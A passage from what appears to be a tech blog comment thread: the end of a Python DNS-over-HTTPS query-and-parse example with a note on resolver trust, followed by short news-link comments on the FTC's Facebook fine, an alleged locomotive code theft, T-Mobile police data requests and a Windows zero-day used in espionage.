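    name is a compression pointer (0xC00C) back to the question at offset 12."""
    header = struct.pack("!HHHHHH", 0, 0x8180, 1, 1, 0, 0)   # QR, RD, RA, NOERROR
    answer = b"\xc0\x0c" + struct.pack("!HHIH", TYPE_A, CLASS_IN, 3600, 4) \
        + bytes(int(x) for x in ipv4.split("."))
    return header + query[12:] + answer


if __name__ == "__main__":
    q = build_query("example.com")
    print(doh_get_url("https://doh.example/dns-query", q))   # placeholder resolver
    print(parse_a_records(constructed_response(q, "192.0.2.1"), "example.com"))
```

Against a real resolver the request is a plain `GET` of that URL with `Accept: application/dns-message`, and the response body is the bytes `parse_a_records` expects. The question-echo check matters: a DoH channel stops your ISP from reading or rewriting the lookup on the wire, but it does nothing about a resolver that answers the wrong question, which is why the choice of resolver (Firefox's `network.trr.uri`) is the real trust decision, and why the ISPA's complaint was really about who gets to see the lookups rather than about the protocol.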
Tomi Engdahl says:
Facebook to be slapped with $5 billion fine for privacy lapses, says WSJ
https://www.cnbc.com/2019/07/12/ftc-fines-facebook-5-billion-for-privacy-lapses.html?__source=facebook%7Cmain
The Federal Trade Commission announced a settlement with Facebook over the company’s 2018 Cambridge Analytica scandal.
The fine represents the largest ever imposed by the FTC against a tech company.
Tomi Engdahl says:
Train maker’s coder goes loco, choo-choo-chooses to flee to China with top-secret code – allegedly
https://www.theregister.co.uk/2019/07/12/train_software_theft/
Xudong “William” Yao stole the software blueprints from his former employer, an unnamed locomotive manufacturer based in Chicago, it is claimed, flew to the Middle Kingdom, and took up a job with a Chinese biz that specializes in automotive telematics – think vehicle monitoring, tracking, and communications.
Tomi Engdahl says:
T-Mobile quietly reported a sharp rise in police demands for cell tower data
https://techcrunch.com/2019/07/12/t-mobile-cell-tower-government-demands/
Tomi Engdahl says:
Confirmed: Microsoft Windows Zero-Day Exploit Used In Government Espionage Operation
https://www.forbes.com/sites/daveywinder/2019/07/12/confirmed-microsoft-windows-zero-day-exploit-used-in-government-espionage-operation/
The highly targeted attacks against government institutions in Eastern Europe, which took place during June 2019, employed the use of a Microsoft Windows zero-day exploit. In and of itself this isn’t unusual as there have been plenty of Windows zero-days discovered